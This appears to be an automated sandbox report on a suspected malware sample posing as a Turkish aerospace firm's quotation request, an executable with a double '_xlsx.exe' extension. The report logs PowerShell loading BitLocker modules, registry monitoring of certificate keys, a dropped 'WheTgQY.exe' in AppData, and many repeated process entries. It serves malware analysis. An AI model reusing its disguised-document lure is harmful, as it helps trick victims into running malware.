Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
